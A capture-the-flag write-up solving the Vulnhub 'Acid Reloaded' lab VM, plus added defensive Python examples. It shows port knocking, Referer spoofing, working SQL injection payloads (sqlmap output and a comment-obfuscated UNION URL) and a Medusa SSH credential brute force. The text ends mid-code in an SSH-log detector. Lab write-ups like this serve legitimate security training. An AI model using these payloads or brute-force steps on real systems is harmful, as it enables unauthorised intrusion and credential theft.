Mr_H4sh

Infosec, CTF and more

Acid Reloaded Solution

Hi guys, it looks like I’m going crazy with these hacking games :)

Since I’ve already completed the first Acid server challenge (which I’ll post one day; I’m feeling lazy and want to move on), today I’m going to show you how I completed the new chapter of Acid.

Again, thanks to Vulnhub for keeping me busy with all those challenges, and thanks to all the people who host new challenges.

This challenge involves hacking techniques and a bit of logic.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will get an IP address assigned automatically, so I ran the following command to discover the IP address of the victim machine:

fping -a -g 192.168.56.1/24 > alive_hosts.txt

# cat alive_hosts.txt

192.168.56.102 <== attacker
192.168.56.103 <== victim

Once I’d discovered that the victim’s IP address was 192.168.56.103, I ran a port scan to check the victim’s open ports.

nmap -sT -p- -Pn 192.168.56.103 > nmap_scan.txt

# cat nmap_scan.txt 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-12 18:34 BST
Warning: 192.168.56.103 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.56.103
Host is up (0.00095s latency).
Not shown: 64166 closed ports, 1368 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 25.31 seconds

No. Just port 22 open. There could be a service that a stealth (SYN) scan would show, so I tried again with this:

nmap -sS -p- -Pn 192.168.56.103 > nmap_scan_stealth.txt

# cat nmap_scan_stealth.txt 

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-12 18:50 BST
Warning: 192.168.56.103 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.56.103
Host is up (0.00090s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
5650/tcp  filtered unknown
9810/tcp  filtered unknown
15749/tcp filtered unknown
18386/tcp filtered unknown
22524/tcp filtered unknown
33447/tcp filtered unknown
45656/tcp filtered unknown
62670/tcp filtered unknown
MAC Address: 08:00:27:4B:7A:83 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 809.26 seconds

Much better. I found a bunch of filtered ports that need to be investigated.

Second step: VULNERABILITY SCAN

The first thing I tried was to check whether any of these ports was actually used by an application server.

Nothing: all the ports were filtered, and with both telnet and curl I got a connection refused.

Last resort: the open port 22, i.e. ssh.

The welcome message says:

# ssh 192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ECDSA key fingerprint is a0:a6:52:fb:2c:32:b7:08:b4:ed:61:1d:2d:fa:c8:58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (ECDSA) to the list of known hosts.
    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

									-by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
root@192.168.56.103's password:

I love subliminal messages. It’s a reference to port knocking. In case you have no idea what I’m talking about, read more about how to hide ssh with port knocking, or just check this.

So, I’ve run this command

for x in 3 2 1; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.56.103; done

P.S. If you’re using VirtualBox, please be sure that you’re using just the Host-only Adapter, otherwise the knock will fail. I don’t know why, but as soon as I changed it the port was open.
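To make the “3.2.1” hint concrete, here is a toy model of the gate a knock daemon keeps in front of the hidden port. This is an added example, not the Acid VM’s knockd configuration or any code from the challenge: the per-source timeout, the sample packet trace and the “scanner” address are constructed, while the knock sequence (3, 2, 1) and the protected port (33447) come from the write-up. It shows why a port scan that hits 1, 2, 3 in ascending order never opens the port, while the exact ordered sequence does.

```python
"""Toy port-knocking gate, modelled on the 3-2-1 knock used by the Acid box."""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

KNOCK_SEQUENCE = (3, 2, 1)   # the "3.2.1" from the SSH banner
PROTECTED_PORT = 33447       # the port that appeared after the knock
KNOCK_TIMEOUT = 10.0         # seconds allowed between two knocks (assumption)


@dataclass
class KnockGate:
    sequence: Tuple[int, ...] = KNOCK_SEQUENCE
    timeout: float = KNOCK_TIMEOUT
    # per-source progress: how many knocks of the sequence have matched so far
    progress: Dict[str, int] = field(default_factory=dict)
    last_seen: Dict[str, float] = field(default_factory=dict)
    opened_for: Set[str] = field(default_factory=set)

    def observe(self, src: str, dst_port: int, ts: float) -> bool:
        """Feed one SYN (source, destination port, timestamp).

        Returns True when this packet completes the knock sequence for src."""
        # a stale partial sequence is discarded
        if src in self.last_seen and ts - self.last_seen[src] > self.timeout:
            self.progress[src] = 0
        self.last_seen[src] = ts
        expected = self.sequence[self.progress.get(src, 0)]
        if dst_port == expected:
            self.progress[src] = self.progress.get(src, 0) + 1
        else:
            # wrong port: restart, but let this packet count as a first knock
            self.progress[src] = 1 if dst_port == self.sequence[0] else 0
        if self.progress[src] == len(self.sequence):
            self.progress[src] = 0
            self.opened_for.add(src)
            return True
        return False

    def is_open(self, src: str, dst_port: int) -> bool:
        """Whether a connection from src to dst_port would pass the gate."""
        if dst_port != PROTECTED_PORT:
            return True  # the gate only guards the hidden port
        return src in self.opened_for


def replay(trace: List[Tuple[str, int, float]], gate: KnockGate = None) -> KnockGate:
    """Run a list of (src, dst_port, timestamp) SYNs through a gate."""
    gate = gate or KnockGate()
    for src, port, ts in trace:
        gate.observe(src, port, ts)
    return gate


# constructed trace: a scanner hits ports in ascending order, the knocker in the right one
SAMPLE_TRACE = [
    ("192.168.56.50", 1, 0.0), ("192.168.56.50", 2, 0.1), ("192.168.56.50", 3, 0.2),
    ("192.168.56.102", 3, 5.0), ("192.168.56.102", 2, 5.5), ("192.168.56.102", 1, 6.0),
]

if __name__ == "__main__":
    g = replay(SAMPLE_TRACE)
    print("scanner allowed:", g.is_open("192.168.56.50", PROTECTED_PORT))   # False
    print("knocker allowed:", g.is_open("192.168.56.102", PROTECTED_PORT))  # True
```

From the defender’s side the same state machine explains what the knock looks like in a firewall log: three SYNs from one source to closed low ports within a few seconds, followed by a connection to the hidden port. That pattern is easy to alert on, which is one reason port knocking is obscurity rather than authentication.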

After knocking I’ve run nmap again to check what was changed, and this is what I’ve found:

# nmap -sS -p- -Pn 192.168.56.103 > nmap_scan_stealth_2.txt

# cat nmap_scan_stealth_2.txt

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-12 22:01 BST
Nmap scan report for 192.168.56.103
Host is up (0.014s latency).
Not shown: 65533 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
33447/tcp open     unknown
MAC Address: 08:00:27:4B:7A:83 (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 788.71 seconds

Aaaaaand another port open, 33447. What is it? I made a telnet connection and found out that it was an application server port. I opened it in a browser and this is what I found:

[screenshot: useit]

Third step: WEB VULNERABILITY SCAN

Once I found the webpage I started looking for web vulnerabilities. The source code of the page had nothing strange: no “helping” page title, no cookies, just the background image. Since in the previous chapter of Acid the background image had some hidden hints, I wanted to check whether there was something in the metadata of the image, or in the image itself. Nothing at all.

So, Dirbuster has always been my friend.

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Sun Sep 13 15:44:09 BST 2015
--------------------------------

http://192.168.56.103:33447
--------------------------------
Directories found during testing:

Dirs found with a 403 response:

/images/
/icons/
/html/
/icons/small/
/bin/crack/
/css/
/bin/crack/css/
/bin/css/
/bin/includes/
/bin/crack/js/
/bin/js/
/bin/styles/
/server-status/

Dirs found with a 200 response:

/
/bin/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/index.html
/icons/README.html
/bin/index.php
/bin/crack/license.txt
/bin/crack/README.txt
/bin/error.php
/bin/dashboard.php
/bin/includes/functions.php

Files found with a 302 responce:

/bin/includes/logout.php
/bin/includes/validation.php

That /bin folder looks cool, right?

This is the page I saw at http://192.168.56.103/bin/ [screenshot: logical-login]

A login page. “Be Logical Here” was the heading of the page. I saw from the source that there was a script at crack/js/index.js. From the scan there was also a folder called /bin/crack (strange that DirBuster didn’t find the js folder within it). I also noticed a file called /bin/crack/README.txt. It was a reference to a codepen, with this link. And the JavaScript breaks because jQuery was missing. No worries, it was just a dead end.

Tried with SQL Injection, Blind SQL Injection. Nothing.

There was also /bin/dashboard.php, a page with a funny meme. It was explicitly saying that I wasn’t authorized to access that page. After a few attempts, I decided to try with headers ;)

I’m a big fan of Firefox, and there are plugins that I’ve been using for ages. One of them is the add-on Live HTTP Headers. This is what I did: replay the request for /bin/dashboard.php, adding the page /bin/includes/validation.php as Referer:

[screenshot: referer-login]

Host: 192.168.56.103:33447
Referer: http://192.168.56.103:33447/bin/includes/validation.php
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sec_session_id=b20f38tba6b6dmlrssb05hb2p5
Connection: keep-alive
Cache-Control: max-age=0

So, I clicked on the link and it showed me the page /bin/l33t_haxor.php with just an image: [screenshot: l33t_haxor]

Fourth step: EXPLOITATION

I had a look at the source, and I found

<a href="l33t_haxor.php?id=" style="text-decoration:none"></a>

and guess what? It’s vulnerable to SQL injection, but it’s a tricky one. I noticed that the page returns a message whenever I add an id between 1 and 11, but I got a SQL error when I added just a ‘. Did I mention that it’s a tricky one? Well, it is, because whenever I wrote a SQL injection containing a space or a + it returned an image saying HACKER DETECTED. So, I needed to use a SQLi obfuscation technique to execute the query, or just use a SQL scanner like sqlmap.

sqlmap is a great tool, and you can use tamper scripts for tricky queries like this one. Since the query was failing with spaces, I replaced the spaces with a comment using a tamper script called space2comment. On this website you can find a lot of tamper scripts for sqlmap.
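The “HACKER DETECTED” check is worth a closer look, because it is a blacklist, and blacklists on SQL syntax are not a defence. The following is an added example, not the Acid application’s PHP: it models the check with an assumed query template of the form WHERE (id = '...') (the shape sqlmap’s payloads above imply), runs it against an in-memory SQLite table with constructed rows, and puts the parameterised version beside it. The comment-for-space trick is exactly what space2comment does.

```python
"""A 'space or +' blacklist versus a parameterised query (toy model, SQLite)."""
import sqlite3
from typing import List, Union


def make_db() -> sqlite3.Connection:
    """Constructed sample table; stands in for secure_login.members on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (id TEXT, username TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [("1", "acid"), ("2", "makke"), ("3", "avinash")])
    return db


def blacklist_lookup(db: sqlite3.Connection, raw_id: str) -> Union[str, List[str]]:
    """Vulnerable: rejects ' ' and '+' (the HACKER DETECTED behaviour), then concatenates."""
    if " " in raw_id or "+" in raw_id:
        return "HACKER DETECTED"
    # assumed template: the closing quote and parenthesis are what the
    # page's payloads (id=1') ... ('x'='x) are built to balance
    sql = "SELECT username FROM members WHERE (id = '%s')" % raw_id
    return [row[0] for row in db.execute(sql)]


def safe_lookup(db: sqlite3.Connection, raw_id: str) -> List[str]:
    """Hardened: the value is bound as a parameter, so any SQL inside it is inert data."""
    sql = "SELECT username FROM members WHERE (id = ?)"
    return [row[0] for row in db.execute(sql, (raw_id,))]


# the same input, with spaces and with /**/ comments standing in for spaces
PAYLOAD_WITH_SPACES = "1') OR ('1'='1"
PAYLOAD_COMMENTED = "1')/**/OR/**/('1'='1"

if __name__ == "__main__":
    db = make_db()
    print(blacklist_lookup(db, "1"))                   # ['acid']
    print(blacklist_lookup(db, PAYLOAD_WITH_SPACES))   # HACKER DETECTED
    print(blacklist_lookup(db, PAYLOAD_COMMENTED))     # every username: the filter was bypassed
    print(safe_lookup(db, PAYLOAD_COMMENTED))          # []: the string is just a non-matching id
```

The point for anyone writing the server side: the parameterised version needs no blacklist at all, because the database never parses the user’s value as SQL. Detection logic that looks for spaces in parameters will also miss tab, newline, and parenthesis-only variants; it is the query construction that has to change.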

So, this is the command I’ve used to exploit the query:

sqlmap -u "http://192.168.56.103:33447/bin/l33t_haxor.php?id=1" --dbs --dbms=MySQL -p "id" --tamper=space2comment

And this is what I’ve discovered:

sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 1759=1759 AND ('VXfN'='VXfN

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1') AND (SELECT 7505 FROM(SELECT COUNT(*),CONCAT(0x7170716271,(SELECT (ELT(7505=7505,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('eIur'='eIur

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1') AND (SELECT * FROM (SELECT(SLEEP(5)))ZJVJ) AND ('VwSR'='VwSR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=-8891') UNION ALL SELECT NULL,CONCAT(0x7170716271,0x766e6b53666867747a4c,0x7171706a71)#
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login

Cool, something told me that the secure_login database might be useful.

Believe me, it took a very long time to find the right SQL injection. This website helped me a lot. To make your life easier, this is the SQL injection that I executed:

http://192.168.56.103:33447/bin/l33t_haxor.php?id=10%27%29/**/UNION/**/ALL/**/%28SELECT%28NULL%29,GROUP_CONCAT%28DISTINCT%28TABLE_NAME%29%29FROM%28INFORMATION_SCHEMA.COLUMNS%29WHERE%28TABLE_SCHEMA%29=%27secure_login%27AND%271%27=%271

and this is what I’ve retrieved:

UB3R/strcpy.exe,login_attempts,members,word

UB3R/strcpy.exe is a path: indeed, I downloaded the file strcpy.exe from http://192.168.56.103:33447/UB3R/strcpy.exe.

It looks like the file is a PDF:

# file strcpy.exe

strcpy.exe: PDF document, version 1.5

But when I went to open the file, the right-click suggestion on Kali was “Open with Archive Manager”… and guess what?

[screenshot: hidden-into-pdf]

This was the content of the file acid.txt:

You are at right track.

Don't loose hope..

Good Luck :-)

Kind & Best Regards,
Acid 

The right track? I had just extracted the file. So, the file contained yet another file within.

After a bit of analysis, I started carving the extracted image lol.jpg with foremost, and this is what I found:

# foremost lol.jpg 
Processing: lol.jpg
|*|
# ls -l output/
audit.txt  jpg/       rar/       
# ls -l output/rar/00000117.rar 
-rw-r--r-- 1 root root 941 Sep 16 21:20 output/rar/00000117.rar

# unrar e output/rar/00000117.rar
UNRAR 5.21 freeware      Copyright (c) 1993-2015 Alexander Roshal


Extracting from output/rar/00000117.rar

Extracting  Avinash.contact                                           OK 
Extracting  hint.txt                                                  OK 
All OK

Bingo, two files extracted. This is the content of the file hint.txt:

You have found a contact. Now, go and grab the details :-)

And this is the content of the file Avinash.contact:

<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:MSP2P="http://schemas.microsoft.com/Contact/Extended/MSP2P" xmlns:MSWABMAPI="http://schemas.microsoft.com/Contact/Extended/MSWABMAPI">
    <c:CreationDate>2015-08-23T11:39:18Z</c:CreationDate>
    <c:Extended>
        <MSWABMAPI:PropTag0x3A58101F c:ContentType="binary/x-ms-wab-mapi" c:type="binary">
            AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=
        </MSWABMAPI:PropTag0x3A58101F>
    </c:Extended>
    <c:ContactIDCollection>
        <c:ContactID c:ElementID="599ef753-f77f-4224-8700-e551bdc2bb1e">
            <c:Value>0bcf610e-a7be-4f26-9042-d6b3c22c9863</c:Value>
        </c:ContactID>
    </c:ContactIDCollection>
    <c:EmailAddressCollection>
        <c:EmailAddress c:ElementID="0745ffd4-ef0a-4c4f-b1b6-0ea38c65254e">
            <c:Type>SMTP</c:Type>
            <c:Address>acid.exploit@gmail.com</c:Address>
            <c:LabelCollection>
                <c:Label>Preferred</c:Label>
            </c:LabelCollection>
        </c:EmailAddress>
        <c:EmailAddress c:ElementID="594eec25-47bd-4290-bd96-a17448f7596a" xsi:nil="true"/>
    </c:EmailAddressCollection>
    <c:NameCollection>
        <c:Name c:ElementID="318f9ce5-7a08-4ea0-8b6a-2ce3e9829ff2">
            <c:FormattedName>Avinash</c:FormattedName>
            <c:GivenName>Avinash</c:GivenName>
        </c:Name>
    </c:NameCollection>
    <c:PersonCollection>
        <c:Person c:ElementID="865f9eda-796e-451a-92b1-bf8ee2172134">
            <c:FormattedName>Makke</c:FormattedName>
            <c:LabelCollection>
                <c:Label>wab:Spouse</c:Label>
            </c:LabelCollection>
        </c:Person>
    </c:PersonCollection>
    <c:PhotoCollection>
        <c:Photo c:ElementID="2fb5b981-cec1-45d0-ae61-7c340cfb3d72">
            <c:LabelCollection>
                <c:Label>UserTile</c:Label>
            </c:LabelCollection>
        </c:Photo>
    </c:PhotoCollection>
</c:contact>

From this file I extracted the following information:

- AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= (Base64; it decodes to a blob containing the string NooB@123)
- 0bcf610e-a7be-4f26-9042-d6b3c22c9863
- acid.exploit@gmail.com
- Avinash
- Makke
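The Base64 value deserves a proper decode rather than a guess, because it is not the bare text: it is a MAPI multi-valued property serialised as binary. This is an added example, not code from the challenge. The layout below (a 32-bit little-endian entry count, then per entry a 32-bit byte length followed by NUL-terminated UTF-16LE text) is recovered from the bytes of the blob on the page and agrees with the property type in the tag name, whose low 16 bits 0x101F are PT_MV_UNICODE; the tag_type table lists only the handful of MAPI types I am sure of.

```python
"""Decode the MSWABMAPI:PropTag0x3A58101F value from Avinash.contact."""
import base64
import struct
from typing import List

# the value from the contact file on the page
CONTACT_BLOB = "AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA="

# MAPI property types I am certain of; the low 16 bits of a tag are the type
MAPI_TYPES = {
    0x001F: "PT_UNICODE",
    0x101F: "PT_MV_UNICODE",
    0x0102: "PT_BINARY",
    0x1102: "PT_MV_BINARY",
}


def tag_type(tag: int) -> str:
    """Property type name for a 32-bit MAPI tag such as 0x3A58101F."""
    return MAPI_TYPES.get(tag & 0xFFFF, "unknown")


def parse_mv_unicode(b64: str) -> List[str]:
    """Parse a Base64-encoded multi-valued UTF-16LE string property.

    Layout (as recovered from the bytes): uint32 LE count, then for each
    entry a uint32 LE byte length and that many bytes of NUL-terminated text.
    Truncated input raises ValueError instead of silently returning junk."""
    data = base64.b64decode(b64)
    if len(data) < 4:
        raise ValueError("blob too short for a count field")
    (count,) = struct.unpack_from("<I", data, 0)
    offset = 4
    values = []
    for _ in range(count):
        if offset + 4 > len(data):
            raise ValueError("truncated length field")
        (length,) = struct.unpack_from("<I", data, offset)
        offset += 4
        chunk = data[offset:offset + length]
        if len(chunk) != length:
            raise ValueError("truncated entry")
        offset += length
        values.append(chunk.decode("utf-16-le").rstrip("\x00"))
    return values


if __name__ == "__main__":
    print(tag_type(0x3A58101F))           # PT_MV_UNICODE
    print(parse_mv_unicode(CONTACT_BLOB))  # ['NooB@123']
```

Decoding it this way also explains the odd-looking prefix bytes (01 00 00 00 12 00 00 00): one entry of 18 bytes, which is the nine UTF-16 code units of NooB@123 plus its terminator.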

Smells like ssh, also because I had no luck with the login page. So, ssh bruteforcer! The one I used is Medusa. I created a list of users and a list of passwords from the information retrieved:

# cat userlist.txt
NooB@123
Avinash
Makke
acid.exploit
avinash
makke
noob@123

# cat passwordlist.txt
AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA= 
NooB@123
0bcf610e-a7be-4f26-9042-d6b3c22c9863
acid.exploit@gmail.com
Avinash
Makke

# medusa -h 192.168.56.103 -U userlist.txt -P passwordlist.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: NooB@123 (1 of 7, 0 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Avinash (2 of 7, 1 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: Makke (3 of 7, 2 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: acid.exploit (4 of 7, 3 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: avinash (5 of 7, 4 complete) Password: Makke (6 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: makke (6 of 7, 5 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: makke (6 of 7, 5 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.56.103 User: makke Password: NooB@123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: AQAAABIAAABOAG8AbwBCAEAAMQAyADMAAAA=  (1 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: NooB@123 (2 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: 0bcf610e-a7be-4f26-9042-d6b3c22c9863 (3 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: acid.exploit@gmail.com (4 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: Avinash (5 of 6 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.56.103 (1 of 1, 0 complete) User: noob@123 (7 of 7, 6 complete) Password: Makke (6 of 6 complete)

Did you notice anything?

Well, exactly!

ACCOUNT FOUND: [ssh] Host: 192.168.56.103 User: makke Password: NooB@123 [SUCCESS]
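The other side of that Medusa run is what it leaves in the target’s sshd log: a burst of “Failed password” lines from one source, then an “Accepted password” from the same source. The following is an added defender-side example, not part of the write-up: it parses standard OpenSSH syslog lines, flags a source that fails THRESHOLD times within WINDOW seconds, and raises a second alert when a flagged source then logs in. The log lines, the threshold and the window are constructed; the lines mirror the run above but are not the VM’s real auth.log.

```python
"""Flag SSH credential-guessing bursts in OpenSSH auth log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Tuple

THRESHOLD = 5   # failures within WINDOW that trigger an alert (assumption)
WINDOW = 60     # seconds

# standard OpenSSH password-auth lines: "Failed password for [invalid user] U from A port P ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+) port \d+ ssh2"
)


def parse_ts(ts: str, year: int = 2015) -> float:
    """Syslog timestamps carry no year; the year is supplied by the caller."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S").timestamp()


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (kind, src) alerts in the order they fire.

    'bruteforce' fires once per source when its failures inside the sliding
    window reach THRESHOLD; 'success_after_bruteforce' fires on every accepted
    login from a source that has already been flagged."""
    recent: Dict[str, Deque[float]] = defaultdict(deque)
    flagged = set()
    alerts: List[Tuple[str, str]] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated log line
        src, t = m["src"], parse_ts(m["ts"])
        if m["result"] == "Failed":
            q = recent[src]
            q.append(t)
            while q and t - q[0] > WINDOW:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= THRESHOLD and src not in flagged:
                flagged.add(src)
                alerts.append(("bruteforce", src))
        elif src in flagged:
            alerts.append(("success_after_bruteforce", src))
    return alerts


# constructed sample log: one legitimate login, then a guessing burst and its success
SAMPLE_LOG = [
    "Sep 17 02:49:00 acid sshd[1190]: Accepted password for makke from 192.168.56.1 port 50000 ssh2",
    "Sep 17 02:50:01 acid sshd[1201]: Failed password for invalid user NooB@123 from 192.168.56.102 port 40100 ssh2",
    "Sep 17 02:50:03 acid sshd[1203]: Failed password for invalid user Avinash from 192.168.56.102 port 40102 ssh2",
    "Sep 17 02:50:05 acid sshd[1205]: Failed password for invalid user Makke from 192.168.56.102 port 40104 ssh2",
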